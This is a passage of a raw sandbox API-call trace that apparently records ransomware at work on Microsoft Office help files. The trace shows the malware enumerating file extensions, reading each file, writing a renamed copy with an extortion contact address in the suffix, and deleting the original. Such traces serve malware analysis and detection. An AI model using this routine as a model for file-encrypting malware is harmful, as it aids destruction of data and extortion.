(lpString1=".pdf", lpString2=".HXT") returned 1 [0253.278] lstrlenW (lpString=".xls") returned 4 [0253.278] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0253.278] lstrlenW (lpString=".xlsx") returned 5 [0253.278] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0253.278] lstrlenW (lpString=".ppt") returned 4 [0253.278] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0253.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0253.278] lstrlenW (lpString=".zip") returned 4 [0253.278] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0253.278] lstrlenW (lpString=".rar") returned 4 [0253.278] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0253.278] lstrlenW (lpString=".bz2") returned 4 [0253.278] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0253.278] lstrlenW (lpString=".7z") returned 3 [0253.278] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0253.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0253.278] lstrlenW (lpString=".dbf") returned 4 [0253.278] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0253.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0253.278] lstrlenW (lpString=".1cd") returned 4 [0253.278] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0253.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0253.278] lstrlenW (lpString=".jpg") returned 4 [0253.278] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0253.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0253.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0253.279] lstrlenW (lpString=".doc") returned 4 [0253.279] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0253.279] lstrlenW (lpString=".docx") returned 5 [0253.279] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0253.279] lstrlenW (lpString=".pdf") returned 4 [0253.279] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0253.279] lstrlenW (lpString=".xls") returned 4 [0253.279] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0253.279] lstrlenW (lpString=".xlsx") returned 5 [0253.279] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0253.279] lstrlenW (lpString=".ppt") returned 4 [0253.279] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0253.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0253.279] lstrlenW (lpString=".zip") returned 4 [0253.279] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0253.279] lstrlenW (lpString=".rar") returned 4 [0253.279] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0253.279] lstrlenW (lpString=".bz2") returned 4 [0253.279] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0253.279] lstrlenW (lpString=".7z") returned 3 [0253.279] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0253.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0253.279] lstrlenW (lpString=".dbf") returned 4 [0253.279] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0253.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0253.279] lstrlenW (lpString=".1cd") returned 4 [0253.279] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0253.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0253.279] lstrlenW (lpString=".jpg") returned 4 [0253.279] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0253.280] lstrcmpiW (lpString1=".HXK", lpString2=".php") returned -1 [0253.280] lstrlenW (lpString="INFOPATHEDITOR_F_COL.HXK") returned 24 [0253.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.280] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=114) returned 1 [0253.280] CloseHandle (hObject=0x398) returned 1 [0253.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk")) returned 0x20 [0253.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0253.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.280] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.280] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0253.281] GetLastError () returned 0x0 [0253.281] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x72, lpOverlapped=0x0) returned 1 [0253.282] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x80, lpOverlapped=0x0) returned 1 [0253.283] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0253.283] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x104, lpOverlapped=0x0) returned 1 [0253.283] SetEndOfFile (hFile=0x210) returned 1 [0253.283] CloseHandle (hObject=0x210) returned 1 [0253.283] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.283] SetEndOfFile (hFile=0x398) returned 1 [0253.285] CloseHandle (hObject=0x398) returned 1 [0253.285] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0253.285] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk")) returned 1 [0253.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0253.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0253.286] lstrlenW (lpString=".doc") returned 4 [0253.286] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0253.286] lstrlenW (lpString=".docx") returned 5 [0253.286] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0253.286] lstrlenW (lpString=".pdf") returned 4 [0253.286] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0253.286] lstrlenW (lpString=".xls") returned 4 [0253.286] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0253.286] lstrlenW (lpString=".xlsx") returned 5 [0253.286] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0253.286] lstrlenW (lpString=".ppt") returned 4 [0253.286] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0253.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0253.286] lstrlenW (lpString=".zip") returned 4 [0253.286] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0253.286] lstrlenW (lpString=".rar") returned 4 [0253.286] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0253.286] lstrlenW (lpString=".bz2") returned 4 [0253.286] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0253.286] lstrlenW (lpString=".7z") returned 3 [0253.286] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0253.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0253.286] lstrlenW (lpString=".dbf") returned 4 [0253.286] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0253.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0253.286] lstrlenW (lpString=".1cd") returned 4 [0253.287] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0253.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0253.287] lstrlenW (lpString=".jpg") returned 4 [0253.287] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0253.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0253.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0253.287] lstrlenW (lpString=".doc") returned 4 [0253.287] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0253.287] lstrlenW (lpString=".docx") returned 5 [0253.287] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0253.287] lstrlenW (lpString=".pdf") returned 4 [0253.287] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0253.287] lstrlenW (lpString=".xls") returned 4 [0253.287] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0253.287] lstrlenW (lpString=".xlsx") returned 5 [0253.287] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0253.287] lstrlenW (lpString=".ppt") returned 4 [0253.287] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0253.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0253.287] lstrlenW (lpString=".zip") returned 4 [0253.287] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0253.287] lstrlenW (lpString=".rar") returned 4 [0253.287] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0253.287] lstrlenW (lpString=".bz2") returned 4 [0253.287] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0253.287] lstrlenW (lpString=".7z") returned 3 [0253.287] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0253.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0253.287] lstrlenW (lpString=".dbf") returned 4 [0253.287] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0253.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0253.288] lstrlenW (lpString=".1cd") returned 4 [0253.288] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0253.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0253.288] lstrlenW (lpString=".jpg") returned 4 [0253.288] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0253.288] lstrcmpiW (lpString1=".HXK", lpString2=".php") returned -1 [0253.288] lstrlenW (lpString="INFOPATHEDITOR_K_COL.HXK") returned 24 [0253.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.288] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=113) returned 1 [0253.288] CloseHandle (hObject=0x398) returned 1 [0253.288] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk")) returned 0x20 [0253.288] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0253.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.289] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.289] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0253.289] GetLastError () returned 0x0 [0253.289] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x71, lpOverlapped=0x0) returned 1 [0253.302] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x80, lpOverlapped=0x0) returned 1 [0253.303] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0253.303] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x104, lpOverlapped=0x0) returned 1 [0253.303] SetEndOfFile (hFile=0x210) returned 1 [0253.303] CloseHandle (hObject=0x210) returned 1 [0253.303] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.303] SetEndOfFile (hFile=0x398) returned 1 [0253.316] CloseHandle (hObject=0x398) returned 1 [0253.316] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0253.316] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk")) returned 1 [0253.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0253.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0253.316] lstrlenW (lpString=".doc") returned 4 [0253.316] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0253.316] lstrlenW (lpString=".docx") returned 5 [0253.316] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0253.316] lstrlenW (lpString=".pdf") returned 4 [0253.316] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0253.316] lstrlenW (lpString=".xls") returned 4 [0253.316] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0253.316] lstrlenW (lpString=".xlsx") returned 5 [0253.316] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0253.316] lstrlenW (lpString=".ppt") returned 4 [0253.316] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0253.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0253.316] lstrlenW (lpString=".zip") returned 4 [0253.316] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0253.316] lstrlenW (lpString=".rar") returned 4 [0253.316] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0253.317] lstrlenW (lpString=".bz2") returned 4 [0253.317] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0253.317] lstrlenW (lpString=".7z") returned 3 [0253.317] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0253.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0253.317] lstrlenW (lpString=".dbf") returned 4 [0253.317] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0253.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0253.317] lstrlenW (lpString=".1cd") returned 4 [0253.317] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0253.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0253.317] lstrlenW (lpString=".jpg") returned 4 [0253.317] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0253.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0253.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0253.317] lstrlenW (lpString=".doc") returned 4 [0253.317] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0253.317] lstrlenW (lpString=".docx") returned 5 [0253.317] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0253.317] lstrlenW (lpString=".pdf") returned 4 [0253.317] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0253.317] lstrlenW (lpString=".xls") returned 4 [0253.317] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0253.317] lstrlenW (lpString=".xlsx") returned 5 [0253.317] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0253.317] lstrlenW (lpString=".ppt") returned 4 [0253.317] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0253.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0253.317] lstrlenW (lpString=".zip") returned 4 [0253.317] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0253.317] lstrlenW (lpString=".rar") returned 4 [0253.317] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0253.318] lstrlenW (lpString=".bz2") returned 4 [0253.318] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0253.318] lstrlenW (lpString=".7z") returned 3 [0253.318] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0253.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0253.318] lstrlenW (lpString=".dbf") returned 4 [0253.318] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0253.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0253.318] lstrlenW (lpString=".1cd") returned 4 [0253.318] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0253.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0253.318] lstrlenW (lpString=".jpg") returned 4 [0253.318] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0253.318] lstrcmpiW (lpString1=".HXC", lpString2=".php") returned -1 [0253.318] lstrlenW (lpString="INFOPATH_COL.HXC") returned 16 [0253.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.318] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=636) returned 1 [0253.318] CloseHandle (hObject=0x398) returned 1 [0253.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc")) returned 0x20 [0253.319] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0253.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.319] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.319] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0253.320] GetLastError () returned 0x0 [0253.320] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x27c, lpOverlapped=0x0) returned 1 [0253.367] WriteFile (in: hFile=0x3ac, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x280, lpOverlapped=0x0) returned 1 [0253.368] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0253.368] WriteFile (in: hFile=0x3ac, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0253.368] SetEndOfFile (hFile=0x3ac) returned 1 [0253.368] CloseHandle (hObject=0x3ac) returned 1 [0253.368] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.368] SetEndOfFile (hFile=0x398) returned 1 [0253.370] CloseHandle (hObject=0x398) returned 1 [0253.370] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0253.370] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc")) returned 1 [0253.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0253.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0253.371] lstrlenW (lpString=".doc") returned 4 [0253.371] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0253.371] lstrlenW (lpString=".docx") returned 5 [0253.371] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0253.371] lstrlenW (lpString=".pdf") returned 4 [0253.371] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0253.371] lstrlenW (lpString=".xls") returned 4 [0253.371] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0253.371] lstrlenW (lpString=".xlsx") returned 5 [0253.371] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0253.371] lstrlenW (lpString=".ppt") returned 4 [0253.371] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0253.371] lstrlenW 